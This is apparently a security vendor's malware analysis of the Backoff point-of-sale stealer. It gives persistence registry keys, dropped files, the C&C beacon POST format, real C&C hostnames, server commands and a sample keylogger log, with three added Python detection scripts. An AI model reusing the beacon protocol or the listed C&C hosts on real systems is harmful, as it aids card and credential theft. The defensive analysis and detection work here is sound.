
Cyren Security Blog

The Cyren Security Blog is where Cyren engineers and thought leaders provide insights, research and analysis on a range of current cybersecurity topics.

Credit card info stolen from point of sale machines targeted by “Backoff” malware

Threat Name: Backoff Malware

Threat Type: Trojan, Keylogger, Stealer

Although this threat has been in the wild for some time, it has recently been reported under the name “Backoff” and is being used to infect the Point-of-Sale (POS) machines of large retail stores in the United States. Its purpose is to steal payment information, particularly credit card data.

The attackers try to plant this threat on POS machines, which mostly run Windows, after first gaining access to them by compromising or exploiting them. Once running on an infected system, it attempts to steal personal data (e.g. credit card information) using methods such as memory scraping and keylogging, and then sends the stolen data to the Command and Control (C&C) server it connects to.

TECHNICAL DETAILS

Startup Technique and payload analysis

The malware usually drops a copy of itself in the %APPDATA% folder and creates registry entries in

HKEY_USERS\<some Class ID>\Software\Microsoft\Windows\CurrentVersion\Run

and

HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run

so that it runs whenever the infected machine is restarted.


There are now several variants of this threat. Their functionality is the same, with small differences in how they install and which C&C server they connect to. The name and version of each variant can be seen in the HTTP POST data it sends to the C&C server.

Name: Backoff

Version: 1.55

MD5: f5b4786c28ccf43e569cb21a6122a97e

When executed, it drops the following files:

%appdata%\mskrnl – (this looks like an RC4-encrypted copy of itself)

%appdata%\AdobeFlashPlayer\mswinhost.exe – (a copy of itself)

%appdata%\AdobeFlashPlayer\log.txt – a text file where it saves the data logged by its keylogging function

It also creates the following registry entries:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion
identifier = “<random characters>”

HKEY_USERS\S-1-5-21-1060284298-261478967-725345543-500\Software\Microsoft\Windows\CurrentVersion
identifier = “<random characters>”

The above registry value is a randomly generated 7-character string, so it differs with every infection.

HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run
Windows NT Service = “%AppData%\AdobeFlashPlayer\mswinhost.exe”

HKEY_USERS\S-1-5-21-1060284298-261478967-725345543-500\Software\Microsoft\Windows\CurrentVersion\Run
Windows NT Service = “%AppData%\AdobeFlashPlayer\mswinhost.exe”

The above Run entries make the threat run at startup.
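The file and registry artefacts listed above are what an incident responder can check for offline. The script below is an added example, not code from the original post or from Cyren: it parses a text registry export (as produced by reg.exe export) of HKEY_USERS from a suspect POS host and flags the Backoff persistence indicators described here, namely a Run value named “Windows NT Service”, any Run value pointing at mswinhost.exe, and a 7-character “identifier” value under CurrentVersion. The export excerpt is constructed for illustration; only REG_SZ values are parsed.

```python
"""Triage a Windows registry export (.reg text) for Backoff persistence indicators.

Added example, not code from the original post or from Cyren. It assumes the
analyst exported HKEY_USERS from a suspect host; the excerpt below is constructed.
"""
import re

# Indicators taken from the write-up
RUN_VALUE_NAME = "Windows NT Service"
DROPPED_BINARY = "mswinhost.exe"
IDENTIFIER_VALUE = "identifier"
IDENTIFIER_LEN = 7

_KEY_RE = re.compile(r"^\[(.+)\]$")                           # [HKEY_...\Key\Path]
_VALUE_RE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"$')    # REG_SZ: "name"="data"

# Constructed export: one infected profile plus a benign Run value (ctfmon)
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_USERS\S-1-5-21-1060284298-261478967-725345543-500\Software\Microsoft\Windows\CurrentVersion]
"identifier"="WgBClNZ"

[HKEY_USERS\S-1-5-21-1060284298-261478967-725345543-500\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows NT Service"="%AppData%\\AdobeFlashPlayer\\mswinhost.exe"
"ctfmon"="C:\\Windows\\System32\\ctfmon.exe"
"""


def parse_reg_export(text):
    """Return {key_path: {value_name: data}} for the REG_SZ values in a .reg dump."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            # .reg files escape backslashes and quotes with a backslash; undo that
            keys[current][m.group(1)] = re.sub(r"\\(.)", r"\1", m.group(2))
    return keys


def find_backoff_indicators(text):
    """Return a list of (key_path, value_name, reason) for every indicator hit."""
    hits = []
    for key, values in parse_reg_export(text).items():
        tail = key.lower().rsplit("\\", 1)[-1]   # last path component, e.g. "run"
        for name, data in values.items():
            if tail == "run" and (name == RUN_VALUE_NAME or DROPPED_BINARY in data.lower()):
                hits.append((key, name, "Run entry matching Backoff persistence"))
            elif tail == "currentversion" and name == IDENTIFIER_VALUE and len(data) == IDENTIFIER_LEN:
                hits.append((key, name, "7-character identifier value"))
    return hits


if __name__ == "__main__":
    for key, name, reason in find_backoff_indicators(SAMPLE_EXPORT):
        print(f"{reason}: [{key}] {name}")
```

Run it against a real export by reading the file (reg.exe writes UTF-16, so open it with encoding="utf-16") and passing the text to find_backoff_indicators. The identifier check is deliberately loose (any 7-character string), so treat that hit as corroborating evidence alongside the Run entry rather than as proof on its own.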

Communication with C&C

Then it tries to connect to its Command and Control (C&C) server and sends the following POST data:

POST /aero2/fly.php HTTP/1.0
Host: <c&c server hostname>
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0
Accept-Language: en-us
Accept-Encoding: text/plain
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

&op=1&id=<random characters>WgBClNZ&ui=<user_name> @ <hostname>&wv=11&gr=backoff&bv=1.55

Where:

op = this seems to always have a value of 1

id = randomly generated characters; this is the string saved in the above-mentioned registry entry

ui = currently logged-in user name and the hostname of the infected machine

wv = Windows version of the infected machine

gr = could be the group name of the malware, e.g. “backoff”

bv = version of the malware, “1.55”
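Because the beacon has a fixed shape (POST to /aero2/fly.php, a form-encoded body carrying exactly the fields op, id, ui, wv, gr and bv, with gr set to “backoff”), a network defender can detect it without relying on the C&C hostnames, which change between variants. The code below is an added example, not code from the original post or from Cyren: it parses a captured raw HTTP request, classifies it as a Backoff check-in or not, and extracts the version, identifier and victim user/hostname for tracking variants. The two captured requests are constructed; the C&C hostname in the first is a placeholder.

```python
"""Classify captured HTTP requests as Backoff C&C beacons.

Added example, not code from the original post or from Cyren. Detection keys on
the request shape described in the write-up rather than on C&C hostnames.
"""
from urllib.parse import parse_qs

BEACON_PATH = "/aero2/fly.php"                     # from the write-up
BEACON_FIELDS = {"op", "id", "ui", "wv", "gr", "bv"}
BEACON_GROUP = "backoff"
IDENTIFIER_LEN = 7                                 # the "id" value is a 7-character string

# Constructed capture shaped like the write-up's POST (hostname is a placeholder)
BEACON_REQUEST = (
    "POST /aero2/fly.php HTTP/1.0\r\n"
    "Host: cnc.example.invalid\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\r\n"
    "Accept-Language: en-us\r\n"
    "Accept-Encoding: text/plain\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 75\r\n"
    "\r\n"
    "&op=1&id=WgBClNZ&ui=Administrator @ POS-TERMINAL-7&wv=11&gr=backoff&bv=1.55"
)

# Constructed benign form post: same content type, some overlapping fields, wrong shape
BENIGN_REQUEST = (
    "POST /login.php HTTP/1.1\r\n"
    "Host: intranet.example.invalid\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 26\r\n"
    "\r\n"
    "user=clerk&op=1&gr=backoff"
)


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def classify_backoff_beacon(raw):
    """Return beacon details if the request matches Backoff's check-in, else None."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or not path.endswith(BEACON_PATH):
        return None
    if "application/x-www-form-urlencoded" not in headers.get("content-type", ""):
        return None
    # parse_qs tolerates the leading "&" seen in the captured body
    fields = {k: v[0] for k, v in parse_qs(body).items()}
    if not BEACON_FIELDS.issubset(fields) or fields["gr"].lower() != BEACON_GROUP:
        return None
    user, _, host = fields["ui"].partition(" @ ")
    return {
        "cnc_host": headers.get("host", ""),
        "id": fields["id"],
        "id_length_ok": len(fields["id"]) == IDENTIFIER_LEN,
        "user": user.strip(),
        "hostname": host.strip(),
        "windows_version": fields["wv"],
        "malware_version": fields["bv"],
    }


if __name__ == "__main__":
    for label, req in (("beacon", BEACON_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, "->", classify_backoff_beacon(req))
```

Feed it the reassembled request bodies from a proxy or IDS capture; the returned id ties a network sighting to the “identifier” registry value on the host, and malware_version lets you see which variant a given terminal is running.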

C&C server hosts:

pop3smtp5imap2.com/aero2/fly.php

pop3smtp5imap3.com/aero2/fly.php

pop3smtp5imap4.ru/aero2/fly.php

After a successful connection to the C&C server, it receives a reply, which is usually a command or instruction from the server. The usual reply is the string “Thanks!”, which is probably just an acknowledgement that it has successfully connected to the server.

A “Thanks!” reply looks like this:

HTTP/1.1 200 OK
Server: nginx/1.4.7
Date: Fri, 01 Aug 2014 22:09:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.28-1~dotdeb.0

Thanks!

Other commands

Other commands that the malware will get from the server are as follows:

* Update – most likely to instruct the malware to try and get an updated version

* Terminate – most likely to terminate all running instances in the infected machine

* Uninstall – most likely to uninstall or remove everything from the infected machine

* Download and Run – this command most likely carries additional data in the response, including a link or location of a file to download and execute.

* Upload Keylogs – most likely the command to upload the text file containing the keylogger's logged data (log.txt)

Keylogging Function:

As mentioned, the threat has a keylogging function which logs the name of the currently active window and any keystrokes performed in that window. As an example, the contents of log.txt may look like this:

[Arrow Right][Backspace][Backspace][Backspace]
[Run] – [02/08/2014 17:40:40]
%appdata%[Arrow Down]
[Program Manager] – [02/08/2014 17:40:41]
[Enter]
[about:blank – Microsoft Internet Explorer] – [03/08/2014 16:03:46]
www.bankofamerica.com[Enter]mybogusloginID[Enter]
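When log.txt is recovered from an infected terminal, the first question is which windows had input captured and what was typed there, since that decides who has to be notified. The parser below is an added example, not code from the original post or from Cyren. It assumes the layout shown above: a header line of the form “[Window Title] – [dd/mm/yyyy HH:MM:SS]” followed by keystroke lines in which special keys appear as bracketed tokens; the day-first date order is inferred from the sample and is an assumption. The log excerpt is constructed to mirror the sample.

```python
"""Turn a recovered Backoff log.txt into a per-window keystroke timeline.

Added example, not code from the original post or from Cyren. Assumes the
header layout "[Window Title] - [dd/mm/yyyy HH:MM:SS]" shown in the write-up
(hyphen or en dash accepted); day-first dates are an assumption from the sample.
"""
import re
from datetime import datetime

HEADER_RE = re.compile(
    r"^\[(?P<title>.*)\] [-\u2013] \[(?P<ts>\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2})\]$"
)
TOKEN_RE = re.compile(r"\[[^\]]+\]|[^\[]+")   # a [Special Key] token or a run of typed text

# Constructed log mirroring the post's sample (en dash written as \u2013)
SAMPLE_LOG = (
    "[Arrow Right][Backspace][Backspace][Backspace]\n"
    "[Run] \u2013 [02/08/2014 17:40:40]\n"
    "%appdata%[Arrow Down]\n"
    "[Program Manager] \u2013 [02/08/2014 17:40:41]\n"
    "[Enter]\n"
    "[about:blank \u2013 Microsoft Internet Explorer] \u2013 [03/08/2014 16:03:46]\n"
    "www.bankofamerica.com[Enter]mybogusloginID[Enter]\n"
)


def parse_keylog(text):
    """Return a list of {title, timestamp, tokens} entries in log order.

    Keystrokes before the first header belong to an unknown window (the log
    was rotated or uploaded mid-window) and are kept under a placeholder title.
    """
    entries = []
    current = {"title": "<unknown: log starts mid-window>", "timestamp": None, "tokens": []}
    for line in text.splitlines():
        if not line.strip():
            continue
        m = HEADER_RE.match(line)
        if m:
            if current["tokens"] or current["timestamp"] is not None:
                entries.append(current)
            current = {
                "title": m.group("title"),
                "timestamp": datetime.strptime(m.group("ts"), "%d/%m/%Y %H:%M:%S"),
                "tokens": [],
            }
        else:
            current["tokens"].extend(TOKEN_RE.findall(line))
    if current["tokens"] or current["timestamp"] is not None:
        entries.append(current)
    return entries


def typed_segments(tokens):
    """Reconstruct visible input: text runs split at [Enter], with [Backspace] applied."""
    segments, buf = [], ""
    for tok in tokens:
        if tok == "[Enter]":
            if buf:
                segments.append(buf)
            buf = ""
        elif tok == "[Backspace]":
            buf = buf[:-1]
        elif tok.startswith("[") and tok.endswith("]"):
            continue                     # arrows and other special keys add no text
        else:
            buf += tok
    if buf:
        segments.append(buf)
    return segments


def windows_with_typed_input(text):
    """Map window title -> typed segments, i.e. the windows whose input was exposed."""
    exposed = {}
    for entry in parse_keylog(text):
        segs = typed_segments(entry["tokens"])
        if segs:
            exposed.setdefault(entry["title"], []).extend(segs)
    return exposed


if __name__ == "__main__":
    for entry in parse_keylog(SAMPLE_LOG):
        print(entry["timestamp"], entry["title"], typed_segments(entry["tokens"]))
```

On the sample this attributes “%appdata%” to the Run dialog and the bank URL plus a login ID to the Internet Explorer window, while the Program Manager entry (only an [Enter]) drops out; that per-window view is what you need when deciding which credentials and card-entry sessions to treat as compromised.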

There are multiple variations of the malware which drop differently named files and use different registry entries.
